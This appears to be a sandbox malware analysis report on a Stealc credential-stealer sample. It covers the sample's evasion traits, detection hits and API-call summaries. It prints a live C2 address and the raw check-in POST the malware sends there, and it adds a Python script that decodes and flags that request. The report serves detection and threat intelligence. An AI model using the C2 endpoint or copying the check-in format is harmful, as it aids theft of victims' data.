

Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560054
MD5: 88d9a99ca46e751ab8202680c23046f3
SHA1: dcba4b2d61dc2e695d2f0d6c4e4011cfd66d547f
SHA256: 16503ad13cedbcd3a80af81e25a871ef01ca4606fa2e61f3960924fd2c000ee4
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 88D9A99CA46E751AB8202680C23046F3)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Yara matches (Source / Rule / Description / Author):
  • dump.pcap / JoeSecurity_Stealc_1 / Yara detected Stealc / Joe Security
  • 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
  • 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
  • 00000001.00000003.1342030048.00000000054D0000.00000004.00001000.00020000.00000000.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
  • Process Memory Space: file.exe PID: 7408 / JoeSecurity_PowershellDownloadAndExecute / Yara detected Powershell download and execute / Joe Security
  • Process Memory Space: file.exe PID: 7408 / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
              No Sigma rule has matched
Suricata alert (Timestamp / SID / Severity / Classtype / Source / Destination / Protocol):
  • 2024-11-21T11:03:20.179542+0100 / 2044243 / 1 / Malware Command and Control Activity Detected / 192.168.2.7:49707 / 185.215.113.206:80 / TCP



              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpft | Avira URL Cloud: Label: malware
Source: 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: file.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B04C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00B04C50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B240B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_00B240B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00B060D0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B16960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_00B16960
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B0EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,1_2_00B0EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B09B80 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00B09B80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B09B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00B09B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B16B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_00B16B79
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B07750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00B07750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B13910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B13910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B1E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B11269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B11269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B11250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B11250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B12390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_00B12390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B0DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B0DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B0DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B0DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B1CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B14B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B14B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B14B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B14B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_00B1DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B1D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B016A0

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49707 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJ
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 43 43 33 38 37 45 36 37 43 39 33 32 37 33 31 37 38 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 2d 2d 0d 0a
  Data Ascii:
    ------GDBAKEGIDBGIEBFHDHJJ
    Content-Disposition: form-data; name="hwid"

    688CC387E67C932731780
    ------GDBAKEGIDBGIEBFHDHJJ
    Content-Disposition: form-data; name="build"

    mars
    ------GDBAKEGIDBGIEBFHDHJJ--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (seven connections)
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 (same request and body as the global-traffic entry above)
Source: file.exe, 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1383935885.00000000018E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php8
Source: file.exe, 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpft
Source: file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phph
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B09770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop
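The check-in request logged in the Networking section, decoded and triaged. This is an added example, not code from the Joe Sandbox report or from Stealc: REQUEST_HEAD reproduces the request line and headers as the report logs them, and BODY is the report's Data Raw hex dump decoded. The heuristics mirror findings the report itself raised ("HTTP GET or POST without a user agent", "TCP traffic detected without corresponding DNS query", a multipart body carrying hwid and build). The hwid/build check is this example's summary of the observed body shape, not the content of Suricata rule 2044243.

```python
"""Decode and triage the Stealc check-in POST from the report.

Added example. REQUEST_HEAD is the logged request line and headers; BODY is
the report's 'Data Raw' hex dump decoded. The heuristics reproduce the
report's own network findings; they are not the Suricata rule's logic.
"""
import re

REQUEST_HEAD = (
    b"POST /c4becf79229cb002.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJ\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 210\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)

# 'Data Raw' from the report, verbatim; bytes.fromhex() ignores the spaces.
BODY = bytes.fromhex(
    "2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "36 38 38 43 43 33 38 37 45 36 37 43 39 33 32 37 33 31 37 38 30 0d 0a "
    "2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    "6d 61 72 73 0d 0a "
    "2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 2d 2d 0d 0a"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body, content_type):
    """Minimal multipart/form-data parser: returns {field name: raw value bytes}."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delim = b"--" + m.group(1).encode("latin-1")   # RFC 2046: two dashes + boundary
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):                  # closing delimiter "--boundary--"
            break
        part = part[2:] if part.startswith(b"\r\n") else part   # CRLF after the delimiter
        part = part[:-2] if part.endswith(b"\r\n") else part    # CRLF before the next one
        part_headers, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_headers)
        if name:
            fields[name.group(1).decode("latin-1")] = value
    return fields


def triage_checkin(raw):
    """Extract the form fields and list why the request looks like a stealer check-in."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}(:\d+)?", headers.get("host", "")):
        reasons.append("Host is a bare IPv4 address (no DNS lookup precedes the connection)")
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    declared = int(headers.get("content-length", "-1"))
    if declared != len(body):
        reasons.append(f"Content-Length {declared} != body length {len(body)}")
    fields = {}
    if method == "POST" and headers.get("content-type", "").startswith("multipart/form-data"):
        fields = {k: v.decode("latin-1") for k, v in parse_multipart(body, headers["content-type"]).items()}
        if {"hwid", "build"} <= fields.keys():
            reasons.append("multipart body carrying hwid and build fields (Stealc check-in shape)")
    return {"path": path, "fields": fields, "reasons": reasons}


if __name__ == "__main__":
    print(triage_checkin(REQUEST_HEAD + BODY))
```

The hwid value (688CC387E67C932731780) is what the stealer uses to identify the victim host, and "mars" is the build tag carried in the sample's configuration, so both fields are worth pivoting on across other captures of the same campaign.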

              System Summary

Source: file.exe | Static PE information: section name: (empty name as extracted)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty name as extracted)
